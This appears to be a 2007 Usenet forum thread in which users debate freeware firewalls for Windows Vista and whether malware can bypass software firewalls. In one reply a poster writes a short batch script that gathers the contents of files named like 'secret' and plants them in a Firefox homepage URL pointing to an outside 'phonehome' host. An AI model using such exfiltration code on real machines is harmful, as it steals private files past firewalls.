Firewall

Discussion in 'Computer Security' started by Sebastian G., Jun 7, 2007.

  1. Sebastian G.

    Sebastian G. Guest

    Ferd wrote:

    > Can anyone recomend a freeware firewall for windows Vista.

    Wipfw.

    > The ones I have tried Comodo, Kerio,PC plus firewall, etc have Driver

    > compatability issues.

    And are no firewalls at all.

    > Some even lock up computer.

    That's what these software packages are supposed to do...

    Sebastian G., Jun 7, 2007

  2. Sebastian G.

    Jim Watt Guest

    On Fri, 08 Jun 2007 01:41:22 -0700, Ferd <> wrote:

    >Can anyone recomend a freeware firewall for windows Vista. The ones I
    >have tried Comodo, Kerio,PC plus firewall, etc have Driver
    >compatability issues. Some even lock up computer. Any ideas?
    >Ferd

    Why do you feel you need a third party software 'firewall' ?
    --
    Jim Watt
    http://www.gibnet.com

    Jim Watt, Jun 7, 2007

  3. Sebastian G.

    Ferd Guest

    On Thu, 07 Jun 2007 18:22:53 +0200, Jim Watt <_way>
    wrote:

    >On Fri, 08 Jun 2007 01:41:22 -0700, Ferd <> wrote:
    >
    >>Can anyone recomend a freeware firewall for windows Vista. The ones I
    >>have tried Comodo, Kerio,PC plus firewall, etc have Driver
    >>compatability issues. Some even lock up computer. Any ideas?
    >>Ferd

    >Why do you feel you need a third party software 'firewall' ?

    Jim, thanks, I have a new laptop and its very slow on internet, and I
    suspect a lot of unwanted programs are up-dating and I want to stop
    them. The built in firewall is too hard to configure. The machine came
    with Nortons which I remove because the machine barely crawled along
    and was almost unusable. now running AVG with no problems.
    Ferd

    Ferd, Jun 8, 2007
  4. Sebastian G.

    Vanguard Guest

    "Ferd" <> wrote in message
    > On Thu, 07 Jun 2007 18:22:53 +0200, Jim Watt <_way>
    > wrote:
    >
    >>On Fri, 08 Jun 2007 01:41:22 -0700, Ferd <> wrote:
    >>
    >>>Can anyone recomend a freeware firewall for windows Vista. The ones I
    >>>have tried Comodo, Kerio,PC plus firewall, etc have Driver
    >>>compatability issues. Some even lock up computer. Any ideas?
    >>>Ferd

    >>Why do you feel you need a third party software 'firewall' ?

    > Jim, thanks, I have a new laptop and its very slow on internet, and I
    > suspect a lot of unwanted programs are up-dating and I want to stop
    > them. The built in firewall is too hard to configure. The machine came
    > with Nortons which I remove because the machine barely crawled along
    > and was almost unusable. now running AVG with no problems.
    > Ferd

    If they are well-behaved applications, they will provide you with an
    option to disable their updating feature, so go configure them not to
    update. If they don't that option, consider them trashware and find an
    alternative product.

    If you want to know what process is generating network traffic, you
    could get a sniffer, like Ethereal or Nirsoft's SmartSniff.

    Program can only run if they can get loaded into real (physical) memory.
    Nothing runs unless it gets there. You could use DiamondCS
    ProcessControl to regulate by permission just what can and cannot load
    into memory. However, YOU are the authority in deciding what loads.

    Ferd, Jun 8, 2007
  6. Sebastian G.

    Hexalon Guest

    On Jun 7, 7:59 pm, "Vanguard" <> wrote:
    > "Ferd" <> wrote in message

    > > On Thu, 07 Jun 2007 18:22:53 +0200, Jim Watt <_way>
    > > wrote:

    > >>Why do you feel you need a third party software 'firewall' ?

    > > Jim, thanks, I have a new laptop and its very slow on internet, and I
    > > suspect a lot of unwanted programs are up-dating and I want to stop
    > > them. The built in firewall is too hard to configure. The machine came
    > > with Nortons which I remove because the machine barely crawled along
    > > and was almost unusable. now running AVG with no problems.
    > > Ferd

    > If they are well-behaved applications, they will provide you with an
    > option to disable their updating feature, so go configure them not to
    > update. If they don't that option, consider them trashware and find an
    > alternative product.
    >
    > If you want to know what process is generating network traffic, you
    > could get a sniffer, like Ethereal or Nirsoft's SmartSniff.
    >
    > Program can only run if they can get loaded into real (physical) memory.
    > Nothing runs unless it gets there. You could use DiamondCS
    > ProcessControl to regulate by permission just what can and cannot load
    > into memory. However, YOU are the authority in deciding what loads.

    Vista has a firewall built-in. Adjust the permissions so that those
    programs are blocked.

    Hexalon, Jun 8, 2007
  7. Sebastian G.

    Victek Guest

    "Ferd" <> wrote in message
    > Can anyone recomend a freeware firewall for windows Vista. The ones I
    > have tried Comodo, Kerio,PC plus firewall, etc have Driver
    > compatability issues. Some even lock up computer. Any ideas?
    > Ferd

    PC Tools Firewall Plus is the only Vista compatible freeware firewall that
    is not beta-ware. I've used it on both Vista and XP, and it works OK. It
    is "rules based" and in my case it was necessary to add a few rules, but it
    was eventually sorted out.

    http://www.pctools.com/firewall/download/

    Victek, Jun 8, 2007
  8. Sebastian G.

    Sebastian G. Guest

    Hexalon wrote:

    > Vista has a firewall built-in. Adjust the permissions so that those
    > programs are blocked.

    And what exactly stops those untrustworthy programs to remote-control other
    programs that have already been allowed?

    (Just in case you don't get it... the answer is: nothing!)

    Sebastian G., Jun 8, 2007
  9. Sebastian G.

    Jim Watt Guest

    On Fri, 08 Jun 2007 18:45:42 +0200, "Sebastian G." <>
    wrote:

    >Hexalon wrote:
    >

    >> Vista has a firewall built-in. Adjust the permissions so that those
    >> programs are blocked.

    >And what exactly stops those untrustworthy programs to remote-control other
    >programs that have already been allowed?
    >
    >(Just in case you don't get it... the answer is: nothing!)

    except monitoring traffic and being aware of what is running
    on your machine.
    --
    Jim Watt
    http://www.gibnet.com

    Jim Watt, Jun 8, 2007
  10. Sebastian G.

    Ferd Guest

    On Fri, 08 Jun 2007 15:01:42 GMT, "Victek" <> wrote:

    >"Ferd" <> wrote in message
    >> Can anyone recomend a freeware firewall for windows Vista. The ones I
    >> have tried Comodo, Kerio,PC plus firewall, etc have Driver
    >> compatability issues. Some even lock up computer. Any ideas?
    >> Ferd

    >PC Tools Firewall Plus is the only Vista compatible freeware firewall that
    >is not beta-ware. I've used it on both Vista and XP, and it works OK. It
    >is "rules based" and in my case it was necessary to add a few rules, but it
    >was eventually sorted out.
    >
    >http://www.pctools.com/firewall/download/

    I used pc tools plus and it completely locked puter up, had to go into
    safe mode to get piuter running again. I know there is a builn
    firewall, but its difficult to set up to monitor outgoing traffic
    Thanks for all coimments, maybe i'll try a bit harder to get the built
    in firewall running properly
    Ferd

    Ferd, Jun 9, 2007
  11. Sebastian G.

    Victek Guest

    "Ferd" <> wrote in message
    > On Fri, 08 Jun 2007 15:01:42 GMT, "Victek" <> wrote:
    >

    >>"Ferd" <> wrote in message
    >>> Can anyone recomend a freeware firewall for windows Vista. The ones I
    >>> have tried Comodo, Kerio,PC plus firewall, etc have Driver
    >>> compatability issues. Some even lock up computer. Any ideas?
    >>> Ferd

    >>PC Tools Firewall Plus is the only Vista compatible freeware firewall that
    >>is not beta-ware. I've used it on both Vista and XP, and it works OK. It
    >>is "rules based" and in my case it was necessary to add a few rules, but
    >>it
    >>was eventually sorted out.
    >>
    >>http://www.pctools.com/firewall/download/

    > I used pc tools plus and it completely locked puter up, had to go into
    > safe mode to get piuter running again. I know there is a builn
    > firewall, but its difficult to set up to monitor outgoing traffic
    > Thanks for all coimments, maybe i'll try a bit harder to get the built
    > in firewall running properly
    > Ferd

    There's a program called "Vista Firewall Control" that adds functionality to
    the built-in firewall that you might find useful. Checkout this link:

    http://www.sphinx-soft.com/Vista/index.html

    Victek, Jun 9, 2007
  12. Sebastian G.

    Vanguard Guest

    "Hexalon" wrote in message

    > "Vanguard" wrote:
    >>
    >> "Ferd" wrote ...
    >>
    >>> Jim, thanks, I have a new laptop and its very slow on internet, and
    >>> suspect a lot of unwanted programs are up-dating and I want to stop
    >>> them.

    >> If they are well-behaved applications, they will provide you with an
    >> option to disable their updating feature, so go configure them not to
    >> update. If they don't that option, consider them trashware and find
    >> an
    >> alternative product.
    >>
    >> If you want to know what process is generating network traffic, you
    >> could get a sniffer, like Ethereal or Nirsoft's SmartSniff.
    >>
    >> Program can only run if they can get loaded into real (physical)
    >> memory.
    >> Nothing runs unless it gets there. You could use DiamondCS
    >> ProcessControl to regulate by permission just what can and cannot
    >> load
    >> into memory. However, YOU are the authority in deciding what loads.

    > Vista has a firewall built-in. Adjust the permissions so that those
    > programs are blocked.

    Softwall firewalls can be bypassed. COnsider using them to manage
    well-behaved applications wanting network connectivity. Many can be
    disabled by the malware that you think the firewall will prevent getting
    out from your box. Unless the OP knows what programs are generating the
    network traffic, just how is he to identify which ones to block?

    But then *I* wasn't the one asking about a firewall so you replied to
    the wrong poster. Guess that's what happens when you use the
    webnews-for-dummies interface at Google.

    Vanguard, Jun 11, 2007
  13. Sebastian G.

    Vanguard Guest

    "Sebastian G." <> wrote in message
    > Hexalon wrote:
    >

    >> Vista has a firewall built-in. Adjust the permissions so that those
    >> programs are blocked.

    > And what exactly stops those untrustworthy programs to remote-control
    > other
    > programs that have already been allowed?
    >
    > (Just in case you don't get it... the answer is: nothing!)

    By using a firewall that also monitors injecting or riding. However,
    many users are already pestered by all the prompts to let their normal
    apps connect so often they don't enable or will disable the firewall
    from watching what called what. However, malware can still bypass a
    software firewall so consider using a software firewall to really just
    manager the well-behaved (or lazy) apps.

    Vanguard, Jun 11, 2007
  14. Sebastian G.

    Sebastian G. Guest

    Vanguard wrote:

    > By using a firewall that also monitors injecting or riding.

    You'd wish that such a thing was possible, beside some fertile trials.

    > However, many users are already pestered by all the prompts

    Prompts? Then you've already lost, since nothing stops the malware to
    clicking away these prompts by itself.

    > However, malware can still bypass a
    > software firewall so consider using a software firewall to really just
    > manager the well-behaved (or lazy) apps.

    Well-behaving apps don't need to be managed at all, by definition. Any
    non-well-behaving application should be considered as malicious.

    Sebastian G., Jun 11, 2007
  15. Sebastian G.

    Victek Guest

    > Softwall firewalls can be bypassed. COnsider using them to manage
    > well-behaved applications wanting network connectivity. Many can be
    > disabled by the malware that you think the firewall will prevent getting
    > out from your box. Unless the OP knows what programs are generating the
    > network traffic, just how is he to identify which ones to block?

    Has anyone done in-depth testing of the ability of software firewalls to
    resist being bypassed or shutdown by malware? I've heard people talk about
    this behavior, but I've never seen any documentation.

    Victek, Jun 11, 2007
  16. Sebastian G.

    Sebastian G. Guest

    Victek wrote:

    >> Softwall firewalls can be bypassed. COnsider using them to manage
    >> well-behaved applications wanting network connectivity. Many can be
    >> disabled by the malware that you think the firewall will prevent getting
    >> out from your box. Unless the OP knows what programs are generating the
    >> network traffic, just how is he to identify which ones to block?

    > Has anyone done in-depth testing of the ability of software firewalls to
    > resist being bypassed or shutdown by malware?

    set x=
    for /r %i in (*secret*) do for /f "delims=" %j in (%i) do set x=!x!.%j
    for /r %i in (prefs.js) do echo
    user_pref("browser.homepage.startup","http://phonehome.org?!x!");>>%i

    Any more dumb questions with obvious answers?

    Sebastian G., Jun 11, 2007
  17. Sebastian G.

    Hexalon Guest

    On Jun 8, 11:45 am, "Sebastian G." <> wrote:
    > Hexalon wrote:
    > > Vista has a firewall built-in. Adjust the permissions so that those
    > > programs are blocked.

    > And what exactly stops those untrustworthy programs to remote-control other
    > programs that have already been allowed?
    >
    > (Just in case you don't get it... the answer is: nothing!)

    well if the isn't running as a admin then windows should stop those
    programs from remote controlling other allowed programs.

    Hexalon, Jun 12, 2007
  18. Sebastian G.

    Sebastian G. Guest

    Hexalon wrote:

    > On Jun 8, 11:45 am, "Sebastian G." <> wrote:
    >> Hexalon wrote:
    >>> Vista has a firewall built-in. Adjust the permissions so that those
    >>> programs are blocked.

    >> And what exactly stops those untrustworthy programs to remote-control other
    >> programs that have already been allowed?
    >>
    >> (Just in case you don't get it... the answer is: nothing!)

    > well if the isn't running as a admin then windows should stop those
    > programs from remote controlling other allowed programs.

    Why should it? This remote control, as any other kind of inter-process
    communication, is an intended feature, that's why it won't stop anything.

    Please do yourself a favor and open osk.exe (On-Screen Keyboard from the
    Accessibility Tools), open and instance of the Firefox and focus it, and
    then click on the keys.

    Sebastian G., Jun 12, 2007